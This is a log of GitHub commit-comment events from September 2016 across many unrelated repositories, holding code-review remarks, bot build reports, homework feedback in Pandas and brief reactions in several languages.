{"id":"4560158564","type":"CommitCommentEvent","actor":{"login":"lwgordonimos"},"repo":{"name":"aodn/chef"},"payload":{"comment":{"id":19013432,"position":86,"line":80,"path":"cookbooks/imos_webapps/definitions/geonetwork.rb","commit_id":"7fdd4d5b51587de05d20d74ba2a4a613032830cb","created_at":"2016-09-14T06:49:47Z","updated_at":"2016-09-14T06:49:47Z","body":"Due to above comment, maybe leave the lock file logic in place since it is still relevant/desirable for the content internal to the WAR (unless there is another reason to remove it?)"}},"created_at":"2016-09-14T06:49:47Z"}
{"id":"4560160690","type":"CommitCommentEvent","actor":{"login":"lwgordonimos"},"repo":{"name":"aodn/chef"},"payload":{"comment":{"id":19013438,"position":65,"line":72,"path":"cookbooks/imos_webapps/definitions/geonetwork.rb","commit_id":"7fdd4d5b51587de05d20d74ba2a4a613032830cb","created_at":"2016-09-14T06:50:26Z","updated_at":"2016-09-14T06:50:26Z","body":"Parameterise the host and query components?"}},"created_at":"2016-09-14T06:50:26Z"}
{"id":"4560162606","type":"CommitCommentEvent","actor":{"login":"sberlinches"},"repo":{"name":"sequelize/sequelize"},"payload":{"comment":{"id":19013439,"position":null,"line":null,"path":null,"commit_id":"9f0b5d1af24f6741aadebba411a21dc1d774d2c1","created_at":"2016-09-14T06:50:59Z","updated_at":"2016-09-14T06:50:59Z","body":"@sushantdhiman @janmeier \r\nWhy of this change?\r\nWhat was wrong with the other mysql driver?"}},"created_at":"2016-09-14T06:50:59Z"}
{"id":"4560165051","type":"CommitCommentEvent","actor":{"login":"mickhansen"},"repo":{"name":"sequelize/sequelize"},"payload":{"comment":{"id":19013444,"position":null,"line":null,"path":null,"commit_id":"9f0b5d1af24f6741aadebba411a21dc1d774d2c1","created_at":"2016-09-14T06:51:43Z","updated_at":"2016-09-14T06:51:43Z","body":"@sberlinches Primary reason was prepared statements support IIRC"}},"created_at":"2016-09-14T06:51:43Z"}
{"id":"4560166422","type":"CommitCommentEvent","actor":{"login":"sentsin"},"repo":{"name":"sentsin/layui"},"payload":{"comment":{"id":19013448,"position":null,"line":null,"path":null,"commit_id":"e9d0e1bdb3f4de1ad26ad3e077e2944469155f5a","created_at":"2016-09-14T06:52:10Z","updated_at":"2016-09-14T06:52:10Z","body":"@TechQuery 代码很酷啊。\r\n"}},"created_at":"2016-09-14T06:52:10Z"}
{"id":"4560166541","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19013450,"position":null,"line":null,"path":null,"commit_id":"d1330a0bfe6e42c227c3115b40299a6035bf4190","created_at":"2016-09-14T06:52:12Z","updated_at":"2016-09-14T06:52:12Z","body":"versionNumbers (mitchute) - i386-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 20 test warnings)\n\n * 20 tests had: EIO diffs.\n * 20 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T06:52:12Z"}
{"id":"4560166922","type":"CommitCommentEvent","actor":{"login":"janmeier"},"repo":{"name":"sequelize/sequelize"},"payload":{"comment":{"id":19013453,"position":null,"line":null,"path":null,"commit_id":"9f0b5d1af24f6741aadebba411a21dc1d774d2c1","created_at":"2016-09-14T06:52:18Z","updated_at":"2016-09-14T06:52:18Z","body":"Exactly - https://github.com/sequelize/sequelize/pull/6354"}},"created_at":"2016-09-14T06:52:18Z"}
{"id":"4560169234","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19013462,"position":148,"line":148,"path":"CampChallenge_PHP/003.プログラミング基礎学習３/kiso_03.php","commit_id":"c5bcad56558a312cf886388363ec0ef322eab99d","created_at":"2016-09-14T06:53:00Z","updated_at":"2016-09-14T06:53:00Z","body":"添田です。\r\n色々メモを残すのは良いですね！コメントの内容が気になりますがｗ"}},"created_at":"2016-09-14T06:53:00Z"}
{"id":"4560174199","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19013473,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T06:54:33Z","updated_at":"2016-09-14T06:54:33Z","body":"congrats!"}},"created_at":"2016-09-14T06:54:33Z"}
{"id":"4560174213","type":"CommitCommentEvent","actor":{"login":"dselivanov"},"repo":{"name":"RaRe-Technologies/gensim"},"payload":{"comment":{"id":19013474,"position":95,"line":1296,"path":"gensim/models/word2vec.py","commit_id":"a355c69e8869e27b9fc1b69bc85427f49708787c","created_at":"2016-09-14T06:54:33Z","updated_at":"2016-09-14T06:54:33Z","body":"Why use Euclidean distance? I saw it is used in original paper, but cosine works better (at least subjectively from my experience -  in my R `text2vec` package I evaluated rwmd with both euclidean and cosine distance). "}},"created_at":"2016-09-14T06:54:33Z"}
{"id":"4560180817","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013485,"position":17,"line":1388,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T06:56:32Z","updated_at":"2016-09-14T06:56:32Z","body":"Just saw that there is a wraper for UNIT_FLAG_PASSIVE, unit->IsPassiveToHostile().\r\nI dont understaind the need of that check but i think its enough reasonable to do it and it exist on PetAI so yes keep it."}},"created_at":"2016-09-14T06:56:32Z"}
{"id":"4560181003","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19013487,"position":null,"line":null,"path":null,"commit_id":"400821340b42aa996c1792c8ecb68afde900a3ad","created_at":"2016-09-14T06:56:36Z","updated_at":"2016-09-14T06:56:36Z","body":":tada: "}},"created_at":"2016-09-14T06:56:36Z"}
{"id":"4560185995","type":"CommitCommentEvent","actor":{"login":"dselivanov"},"repo":{"name":"RaRe-Technologies/gensim"},"payload":{"comment":{"id":19013523,"position":25,"line":25,"path":"README.md","commit_id":"c746b7c2d13c422f5abb16d29b9cf671b6f753e6","created_at":"2016-09-14T06:58:01Z","updated_at":"2016-09-14T06:58:01Z","body":"\"deep learning\" is not so deep :-)"}},"created_at":"2016-09-14T06:58:01Z"}
{"id":"4560189581","type":"CommitCommentEvent","actor":{"login":"swansea679"},"repo":{"name":"Evisceration/DeviceControl"},"payload":{"comment":{"id":19013531,"position":8,"line":76,"path":"devicecontrol-next/src/main/AndroidManifest.xml","commit_id":"f7118224290aea335eca3e9ae87fa539b5a52869","created_at":"2016-09-14T06:59:04Z","updated_at":"2016-09-14T06:59:04Z","body":"https://github.com/Evisceration/DeviceControl/commit/f7118224290aea335eca3e9ae87fa539b5a52869#commitcomment-19006822"}},"created_at":"2016-09-14T06:59:04Z"}
{"id":"4560190612","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"argon/mas"},"payload":{"comment":{"id":19013536,"position":null,"line":null,"path":null,"commit_id":"3a02d7b7df68391484f12bb4e9a2043061d765e2","created_at":"2016-09-14T06:59:21Z","updated_at":"2016-09-14T06:59:21Z","body":"@argon Oops, still 1.2.0 in 1.2.1 CC https://github.com/Homebrew/homebrew-core/pull/4770"}},"created_at":"2016-09-14T06:59:21Z"}
{"id":"4560195915","type":"CommitCommentEvent","actor":{"login":"martindiphoorn"},"repo":{"name":"FlussoBV/NgDexie"},"payload":{"comment":{"id":19013561,"position":null,"line":null,"path":null,"commit_id":"838b6e964814cd92e25fade29d0c396fa32c8721","created_at":"2016-09-14T07:00:48Z","updated_at":"2016-09-14T07:00:48Z","body":"#14 "}},"created_at":"2016-09-14T07:00:48Z"}
{"id":"4560200900","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19013568,"position":6,"line":8,"path":".jshintrc","commit_id":"6ec90f9952cb7b1d82c9ca41a0f6eb06523673ff","created_at":"2016-09-14T07:02:11Z","updated_at":"2016-09-14T07:02:11Z","body":"igual los vamos a dejar en tres iguales `===` este cambio lo puedes obviar... "}},"created_at":"2016-09-14T07:02:11Z"}
{"id":"4560203474","type":"CommitCommentEvent","actor":{"login":"jbenet"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19013573,"position":16,"line":23,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T07:02:52Z","updated_at":"2016-09-14T07:02:52Z","body":"linux?"}},"created_at":"2016-09-14T07:02:52Z"}
{"id":"4560203823","type":"CommitCommentEvent","actor":{"login":"jbenet"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19013574,"position":16,"line":23,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T07:02:58Z","updated_at":"2016-09-14T07:02:58Z","body":"bsd? etc?"}},"created_at":"2016-09-14T07:02:58Z"}
{"id":"4560204930","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"flar2/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19013575,"position":null,"line":null,"path":null,"commit_id":"ba0040ae167bce32408e49ee40a12fa4e670e367","created_at":"2016-09-14T07:03:17Z","updated_at":"2016-09-14T07:03:17Z","body":"Amazing idea!"}},"created_at":"2016-09-14T07:03:17Z"}
{"id":"4560205434","type":"CommitCommentEvent","actor":{"login":"dsjagli"},"repo":{"name":"dsjagli/datasciencecoursera"},"payload":{"comment":{"id":19013577,"position":null,"line":null,"path":null,"commit_id":"b18f89d22e192dfe20a10dcce65d7b04cc4fd2f1","created_at":"2016-09-14T07:03:25Z","updated_at":"2016-09-14T07:03:25Z","body":"hi this is my first trail on git hub"}},"created_at":"2016-09-14T07:03:25Z"}
{"id":"4560208798","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19013582,"position":76,"line":70,"path":"app/scripts/controllers/clients-controller.js","commit_id":"6ec90f9952cb7b1d82c9ca41a0f6eb06523673ff","created_at":"2016-09-14T07:04:22Z","updated_at":"2016-09-14T07:04:22Z","body":"👍"}},"created_at":"2016-09-14T07:04:22Z"}
{"id":"4560211076","type":"CommitCommentEvent","actor":{"login":"liangjava"},"repo":{"name":"liangjava/test"},"payload":{"comment":{"id":19013588,"position":1,"line":1,"path":"test.txt","commit_id":"ad26a07cf743be6c44fcacbbc54dae5bf240e191","created_at":"2016-09-14T07:05:00Z","updated_at":"2016-09-14T07:05:00Z","body":"asdgasdg"}},"created_at":"2016-09-14T07:05:00Z"}
{"id":"4560212285","type":"CommitCommentEvent","actor":{"login":"liangjava"},"repo":{"name":"liangjava/test"},"payload":{"comment":{"id":19013589,"position":null,"line":null,"path":null,"commit_id":"ad26a07cf743be6c44fcacbbc54dae5bf240e191","created_at":"2016-09-14T07:05:13Z","updated_at":"2016-09-14T07:05:13Z","body":"大夫撒旦法核算的"}},"created_at":"2016-09-14T07:05:13Z"}
{"id":"4560212980","type":"CommitCommentEvent","actor":{"login":"Michifrei"},"repo":{"name":"Michifrei/MasterMindJSF"},"payload":{"comment":{"id":19013591,"position":null,"line":null,"path":null,"commit_id":"2b655131652367fbc14cc194dec04e20e45480a3","created_at":"2016-09-14T07:05:23Z","updated_at":"2016-09-14T07:05:23Z","body":"#onaction mit dem Namen handlexAction muss im scene.fxml file gleichnamig gemacht werden"}},"created_at":"2016-09-14T07:05:23Z"}
{"id":"4560213896","type":"CommitCommentEvent","actor":{"login":"sushantdhiman"},"repo":{"name":"sequelize/sequelize"},"payload":{"comment":{"id":19013596,"position":null,"line":null,"path":null,"commit_id":"9f0b5d1af24f6741aadebba411a21dc1d774d2c1","created_at":"2016-09-14T07:05:38Z","updated_at":"2016-09-14T07:05:38Z","body":"@sberlinches Performance and prepared statements"}},"created_at":"2016-09-14T07:05:38Z"}
{"id":"4560214181","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19013597,"position":null,"line":null,"path":null,"commit_id":"00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e","created_at":"2016-09-14T07:05:43Z","updated_at":"2016-09-14T07:05:43Z","body":"5626-Plant-HX-min-DT (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2370 of 2370 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T07:05:43Z"}
{"id":"4560216507","type":"CommitCommentEvent","actor":{"login":"robertofrontado"},"repo":{"name":"robertofrontado/OkDataSources"},"payload":{"comment":{"id":19013601,"position":null,"line":null,"path":null,"commit_id":"d9007dd69f6707995c637aed41d3aab3f2192dd7","created_at":"2016-09-14T07:06:23Z","updated_at":"2016-09-14T07:06:23Z","body":"@Reprazent Nice 👍 "}},"created_at":"2016-09-14T07:06:23Z"}
{"id":"4560217122","type":"CommitCommentEvent","actor":{"login":"jbenet"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19013607,"position":22,"line":29,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T07:06:34Z","updated_at":"2016-09-14T07:06:34Z","body":"not portable-- what about linux or the bsds? we have way more linux users than osx users.\r\n\r\nthere are standard ways to do this. check other electron projects on github for how they do it?"}},"created_at":"2016-09-14T07:06:34Z"}
{"id":"4560218566","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19013619,"position":null,"line":null,"path":null,"commit_id":"00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e","created_at":"2016-09-14T07:07:00Z","updated_at":"2016-09-14T07:07:00Z","body":"5626-Plant-HX-min-DT (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T07:07:00Z"}
{"id":"4560218915","type":"CommitCommentEvent","actor":{"login":"7elix"},"repo":{"name":"helhum/realurl"},"payload":{"comment":{"id":19013622,"position":null,"line":null,"path":null,"commit_id":"cf528734b7fc341a2a1f2b0cd019871217d3b705","created_at":"2016-09-14T07:07:07Z","updated_at":"2016-09-14T07:07:07Z","body":"Great!!"}},"created_at":"2016-09-14T07:07:07Z"}
{"id":"4560219450","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19013624,"position":14,"line":26,"path":"app/scripts/controllers/clients-controller.js","commit_id":"6ec90f9952cb7b1d82c9ca41a0f6eb06523673ff","created_at":"2016-09-14T07:07:15Z","updated_at":"2016-09-14T07:07:15Z","body":"esto debería ser response.data directamente... veo que sigues confundido con las promesas y que enviar/tratar en servicios/controlador\r\nte sugiero que leas esta guía: https://github.com/johnpapa/angular-styleguide/blob/master/a1/README.md#data-services y en especial esa parte... es la guía de estilos q usamos. "}},"created_at":"2016-09-14T07:07:15Z"}
{"id":"4560220511","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"TheCBProject/ForgeMultipart"},"payload":{"comment":{"id":19013627,"position":null,"line":null,"path":null,"commit_id":"0321080804b5e46556b45978e57a8ea7400b1e04","created_at":"2016-09-14T07:07:32Z","updated_at":"2016-09-14T07:07:32Z","body":"Ill tackle the saw rendering, i'm pretty familiar with how to do this with the new model system."}},"created_at":"2016-09-14T07:07:32Z"}
{"id":"4560221189","type":"CommitCommentEvent","actor":{"login":"jevolk"},"repo":{"name":"jevolk/athemepark"},"payload":{"comment":{"id":19013630,"position":139,"line":139,"path":"modules/gms/gms.c","commit_id":"54ec3cd0823132d9444dacbfec09c091542861ca","created_at":"2016-09-14T07:07:44Z","updated_at":"2016-09-14T07:07:44Z","body":"group_list_cur"}},"created_at":"2016-09-14T07:07:44Z"}
{"id":"4560221675","type":"CommitCommentEvent","actor":{"login":"Isfirs"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19013631,"position":5,"line":16,"path":"src/main/resources/assets/minecolonies/lang/en_US.lang","commit_id":"9fbadc01e8dc3a5e8dec98ae2935fc88bc2d0d26","created_at":"2016-09-14T07:07:53Z","updated_at":"2016-09-14T07:07:53Z","body":"Maybe a misusage of me. happens quite a lot. I will revert that."}},"created_at":"2016-09-14T07:07:53Z"}
{"id":"4560222656","type":"CommitCommentEvent","actor":{"login":"thilohaas"},"repo":{"name":"rokka-io/rokka-client-php"},"payload":{"comment":{"id":19013632,"position":null,"line":null,"path":null,"commit_id":"7d49571ed0f0a093373a10b6cea15208cbbc7fb2","created_at":"2016-09-14T07:08:12Z","updated_at":"2016-09-14T07:08:12Z","body":"👍  could you please update the bundle to use this version as well?"}},"created_at":"2016-09-14T07:08:12Z"}
{"id":"4560223023","type":"CommitCommentEvent","actor":{"login":"jbenet"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19013633,"position":101,"line":117,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T07:08:17Z","updated_at":"2016-09-14T07:08:17Z","body":"👍 "}},"created_at":"2016-09-14T07:08:17Z"}
{"id":"4560224607","type":"CommitCommentEvent","actor":{"login":"jbenet"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19013638,"position":102,"line":118,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T07:08:45Z","updated_at":"2016-09-14T07:08:45Z","body":"no gateway? i thought if users click \"open\" in a new window (on attachments) would be loaded from gateway?"}},"created_at":"2016-09-14T07:08:45Z"}
{"id":"4560224994","type":"CommitCommentEvent","actor":{"login":"ishmaelt3"},"repo":{"name":"wallon-ines/redmine_shib_auth"},"payload":{"comment":{"id":19013640,"position":null,"line":null,"path":null,"commit_id":"32d23cec170c34e737577c5a2862ff0f55130637","created_at":"2016-09-14T07:08:52Z","updated_at":"2016-09-14T07:08:52Z","body":"Hi,\r\n\r\nI have installed redmine 3.3, is the plugin compatible with 3.3?"}},"created_at":"2016-09-14T07:08:52Z"}
{"id":"4560225676","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19013642,"position":12,"line":11,"path":"app/templates/client/clients.jade","commit_id":"6ec90f9952cb7b1d82c9ca41a0f6eb06523673ff","created_at":"2016-09-14T07:09:03Z","updated_at":"2016-09-14T07:09:03Z","body":"`i.icon.ion-plus-circled(ng-click=\"balblabal\")`"}},"created_at":"2016-09-14T07:09:03Z"}
{"id":"4560226599","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19013646,"position":19,"line":17,"path":"app/templates/client/clients.jade","commit_id":"6ec90f9952cb7b1d82c9ca41a0f6eb06523673ff","created_at":"2016-09-14T07:09:20Z","updated_at":"2016-09-14T07:09:20Z","body":"igual... `a.item(bla bla bla)`"}},"created_at":"2016-09-14T07:09:20Z"}
{"id":"4560227926","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"rastein/sfdat26_homework"},"payload":{"comment":{"id":19013648,"position":null,"line":null,"path":null,"commit_id":"1c889e34289d5ad1abdc1ba7ed59e55171ba3dd1","created_at":"2016-09-14T07:09:43Z","updated_at":"2016-09-14T07:09:43Z","body":"**HW 1 Feedback**\r\n\r\n**More tasty**\r\n- For pd.merge, in order to preserve all the data, a left join first between inspections & violations (how='left', on=['business_id','date']) would have worked better than the default inner join.\r\n- #3 - For this, you can do: inspections[['type','business_id']].groupby('type').count()\r\n- #4 - In your data loads, you can also use parse_dates=['date'] in order to parse that column into a date. Then to create chart:\r\nrestaurant_scores['month'] = restaurant_scores['date'].dt.month\r\nrestaurant_scores.month.value_counts().plot(kind='bar')\r\n- #5 - Don't forget to filter by what is needed.\r\nrestaurant_scores.ix[restaurant_scores.risk_category=='High Risk'].postal_code.value_counts().head(1)\r\n- #6 - You're on the right track. Although this question is asking for values instead of plot.\r\nrestaurant_scores[restaurant_scores.type=='New Ownership'].groupby(['type','risk_category']).business_id.count()\r\n- #8 - Solution: restaurant_scores.Score.hist(bins=10)\r\n\r\n**A Little More Morbid**\r\n- Nice work on this dataset!\r\n- #11 - to make this more readable and interpretable, consider adding parameters such as (figsize = (12,8), sharex = True, sharey = True)\r\n\r\n**Less Morbid**\r\n- #2 - more simply, majors.isnull().sum()\r\n- #4 - groupby('Major') and mean, while works, isn't necessary since Major is already unique in dataset, so you can just report on median\r\n- #5 - major category needed for this. majors.groupby('Major_category').Median.mean().sort_values(ascending=False)\r\n- #6 - sort values and major category needed for this Question.\r\nmajors.groupby('Major_category').Median.mean().sort_values(ascending=False).head()\r\n- #8 - nice job on this chart \r\n\r\nNice work Bob!"}},"created_at":"2016-09-14T07:09:43Z"}
{"id":"4560230324","type":"CommitCommentEvent","actor":{"login":"dmsnell"},"repo":{"name":"communityshare/communityshare"},"payload":{"comment":{"id":19013656,"position":2,"line":12,"path":"community_share/api/analytics/views/record_view.py","commit_id":"877313f95b79fa954964cee6fcd5e41d109f51e3","created_at":"2016-09-14T07:10:22Z","updated_at":"2016-09-14T07:10:22Z","body":"yes we care. will harden it tomorrow on the ✈️ - thanks again for pointing it out!"}},"created_at":"2016-09-14T07:10:22Z"}
{"id":"4560230805","type":"CommitCommentEvent","actor":{"login":"xiaowang897"},"repo":{"name":"xiaowang897/Test123"},"payload":{"comment":{"id":19013659,"position":2,"line":2,"path":"README.md","commit_id":"9abe607858ad5094ffd04cce2c9b3e9e1f387a3f","created_at":"2016-09-14T07:10:29Z","updated_at":"2016-09-14T07:10:29Z","body":"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\r\n    package=\"com.example.administrator.xiaoxi\">\r\n    <uses-permission android:name=\"android.permission.VIBRATE\"/>\r\n\r\n    <application\r\n        android:allowBackup=\"true\"\r\n        android:icon=\"@mipmap/ic_launcher\"\r\n        android:label=\"@string/app_name\"\r\n        android:supportsRtl=\"true\"\r\n        android:theme=\"@style/AppTheme\">\r\n        <activity\r\n            android:name=\".MainActivity\"\r\n            android:label=\"@string/app_name\"\r\n            android:theme=\"@style/AppTheme.NoActionBar\">\r\n            <intent-filter>\r\n                <action android:name=\"android.intent.action.MAIN\" />\r\n\r\n                <category android:name=\"android.intent.category.LAUNCHER\" />\r\n            </intent-filter>\r\n        </activity>\r\n    </application>\r\n\r\n</manifest>"}},"created_at":"2016-09-14T07:10:29Z"}
{"id":"4560230881","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19013661,"position":4,"line":393,"path":"routes/v1.js","commit_id":"c9302d6cf08dc15a648f91a9ada885cffb4fdde6","created_at":"2016-09-14T07:10:30Z","updated_at":"2016-09-14T07:10:30Z","body":"Oui, l'URL qu'on va passer à l'instance n'est pas forcément publique (je me suis laissé avoir par le nom ;) )."}},"created_at":"2016-09-14T07:10:30Z"}
{"id":"4560231239","type":"CommitCommentEvent","actor":{"login":"dmsnell"},"repo":{"name":"communityshare/communityshare"},"payload":{"comment":{"id":19013663,"position":9,"line":17,"path":"community_share/api/analytics/views/record_view.py","commit_id":"877313f95b79fa954964cee6fcd5e41d109f51e3","created_at":"2016-09-14T07:10:36Z","updated_at":"2016-09-14T07:10:36Z","body":"good point"}},"created_at":"2016-09-14T07:10:36Z"}
{"id":"4560231662","type":"CommitCommentEvent","actor":{"login":"xiaowang897"},"repo":{"name":"xiaowang897/Test123"},"payload":{"comment":{"id":19013665,"position":2,"line":2,"path":"README.md","commit_id":"9abe607858ad5094ffd04cce2c9b3e9e1f387a3f","created_at":"2016-09-14T07:10:43Z","updated_at":"2016-09-14T07:10:43Z","body":"456\r\n"}},"created_at":"2016-09-14T07:10:43Z"}
{"id":"4560232056","type":"CommitCommentEvent","actor":{"login":"dmsnell"},"repo":{"name":"communityshare/communityshare"},"payload":{"comment":{"id":19013669,"position":12,"line":20,"path":"community_share/api/analytics/views/record_view.py","commit_id":"877313f95b79fa954964cee6fcd5e41d109f51e3","created_at":"2016-09-14T07:10:49Z","updated_at":"2016-09-14T07:10:49Z","body":"moar good catches"}},"created_at":"2016-09-14T07:10:49Z"}
{"id":"4560233160","type":"CommitCommentEvent","actor":{"login":"dmsnell"},"repo":{"name":"communityshare/communityshare"},"payload":{"comment":{"id":19013674,"position":42,"line":48,"path":"community_share/api/analytics/views/record_view.py","commit_id":"877313f95b79fa954964cee6fcd5e41d109f51e3","created_at":"2016-09-14T07:11:08Z","updated_at":"2016-09-14T07:11:08Z","body":"roger, I was only thinking of API calls when I wrote this…"}},"created_at":"2016-09-14T07:11:08Z"}
{"id":"4560234033","type":"CommitCommentEvent","actor":{"login":"kwonn"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19013676,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-14T07:11:23Z","updated_at":"2016-09-14T07:11:23Z","body":"@sunset1215 okay, thanks! I think I got it to work."}},"created_at":"2016-09-14T07:11:23Z"}
{"id":"4560237528","type":"CommitCommentEvent","actor":{"login":"mchoma"},"repo":{"name":"wildfly-security-incubator/wildfly-capabilities"},"payload":{"comment":{"id":19013683,"position":14,"line":14,"path":"org/wildfly/security/key-store/capabilities.adoc","commit_id":"b970b3b46cecb35b0dc9e7b7e55e0238ba86f1df","created_at":"2016-09-14T07:12:19Z","updated_at":"2016-09-14T07:12:19Z","body":"that contradics:\r\n\"SUPPORTS RUNTIME ONLY: True if the capability can be depended upon by another capability as a runtime-only requirement. Must be 'false' if DYNAMIC is 'true'.\"\r\n\r\nIs it really meant to be \"runtime only\" dependency? "}},"created_at":"2016-09-14T07:12:19Z"}
{"id":"4560240663","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013689,"position":407,"line":407,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:13:12Z","updated_at":"2016-09-14T07:13:12Z","body":"orderIsShowPolygon、showPolygonAndHideCircle、hidePolygonAndShowCircle这三个函数是不是可以合并为一个方法？因为它们三个的数据源都是同一份，showPolygonAndHideCircle和hidePolygonAndShowCircle本来就是可以做合并的，而orderIsShowPolygon仅仅是做调哪个方法的区分，但这个方法本身却没有什么内部逻辑，判断依据的来源依然是showPolygonAndHideCircle和hidePolygonAndShowCircle这两个方法的数据源"}},"created_at":"2016-09-14T07:13:12Z"}
{"id":"4560242434","type":"CommitCommentEvent","actor":{"login":"koppor"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":19013693,"position":null,"line":null,"path":null,"commit_id":"d10fbbe9cdbb226da6bf6b752b3a6c6de95cf748","created_at":"2016-09-14T07:13:40Z","updated_at":"2016-09-14T07:13:40Z","body":"Somethimes, I ordered by my personal priority. Currently, this does not happen :innocent:. @stefan-kolb WDYT? I would first put the non-issue related things, and then the issues ordered. We can do that directly in the `master` branch."}},"created_at":"2016-09-14T07:13:40Z"}
{"id":"4560245280","type":"CommitCommentEvent","actor":{"login":"ruhaly"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":19013697,"position":14,"line":273,"path":"src/compiler/compile.js","commit_id":"2f9be54ef1eeb5e903c3aacf574639bbb72e7724","created_at":"2016-09-14T07:14:28Z","updated_at":"2016-09-14T07:14:28Z","body":"？"}},"created_at":"2016-09-14T07:14:28Z"}
{"id":"4560245652","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19013698,"position":null,"line":null,"path":null,"commit_id":"96af43f4445411a8c2db4faf01ce10496a01590c","created_at":"2016-09-14T07:14:35Z","updated_at":"2016-09-14T07:14:35Z","body":":O Repo changed. Was wondering why my bookmark broke. :P "}},"created_at":"2016-09-14T07:14:35Z"}
